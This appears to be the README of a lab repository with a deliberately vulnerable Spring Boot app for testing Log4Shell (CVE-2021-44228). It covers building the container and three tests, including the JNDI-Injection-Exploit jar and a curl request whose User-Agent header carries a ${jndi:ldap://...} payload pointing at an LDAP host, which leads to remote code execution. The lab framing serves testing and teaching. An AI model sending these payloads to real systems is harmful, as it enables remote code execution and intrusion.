# log4shell

Vulnerable application to test CVE-2021-44228

## Description
Contains a vulnerable Java Springboot Web app that is vulnerable to CVE-2021-44228 along with some helpful tools to help test the exploit. 

The web app has 2 REST API endpoints:
- / - App logs all the headers and returns a string containing all the request headers
- /agent - App logs the user-agent header and returns a string containing the User-Agent header from the request

## Installation
The Springboot Application can be built and deployed as a container.

First, let's build an image using the provided Dockerfile.
```
docker build -t log4shell .
```
After the image has been built, run the container to deploy the application on port 8080.
```
docker run --name log4shell -p 8080:8080 log4shell
```

Make sure you have Python 3 installed and a Java Runtime environment. 

## Usage
Once the vulnerable application is running, we can use various tools to try and exploit the vulnerability.

1. Use a [Community provided Python script](https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6) to see if the JDNI call is made from the application. The script will make a call to the application and pass the malicious string as a User-Agent header. It will report if the application is likely vulnerable to this type of attack. 

```
cd tools
python log4j_rce.py --attacker-host <local-ip-where-script-is-running>:1389 --timeout 10 http://localhost:8080 
```
If the application is susptiable to this vulnerability (which this application is) we will see the following response from the script.
```
[log4jscanner:log4j_rce.py] DEBUG - Connected by ('192.168.0.XXX', 1160). If this is the same host you attacked its most likely vulnerable
300c020101600702010304008000
```

2. Generate [Log4Shell Canary Token](https://canarytokens.org/generate) to pass that in as a header value to the application. Select Log4Shell from the dropdown and provide an email address. If the application is susptiable to this vulnerability (which this application is), the application will reach out to the temp subdomain setup for your canary token and an email will be sent to the provided email address when the alarm is tripped.

The canary token can be passed into any paramater that we possibly can to try and test. This includes headers, path parameters, query paramaters, request body, etc. 


Example
```
Pass in the canary token as user-agent header: ${jndi:ldap://XXXXXXXXXXXX.canarytokens.com/a}

Email Alert Triggered
| Channel        | DNS                       |
|----------------|---------------------------|
| Time           | 2021-12-11 20:37:19 (UTC) |
| Canarytoken    | XXXXXXXXXXXX              |
| Token Reminder | Test Spring App           |
| Token Type     | log4shell                 |
| Source IP      | 208.XX.XXX.XX             |
```

3. Use [JNDI Injection Exploit](https://github.com/welk1n/JNDI-Injection-Exploit) to create a and inject a malicious class into the application to perform RCE. In this example, we will create a file called file.txt on the running container to demonstate that RCE is possible. 
```
cd tools
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch file.txt"
```
JNDI-Injection-Exploit project will provide ldap and rmi links (we are only testing with ldap here) to test. 

Using a tool like Postman or cURL, make a GET request to `http://localhost:8080/` with the link provided by JNDI-Injection-Exploit as the `User-Agent` header.
Example:
```
curl --location --request GET 'http://localhost:8080/' \
--header 'User-Agent: ${jndi:ldap://192.168.0.117:1389/idt8h2}'
```
Check the container and see `file.txt` created on the container.
```
docker exec -it log4shell ls
```
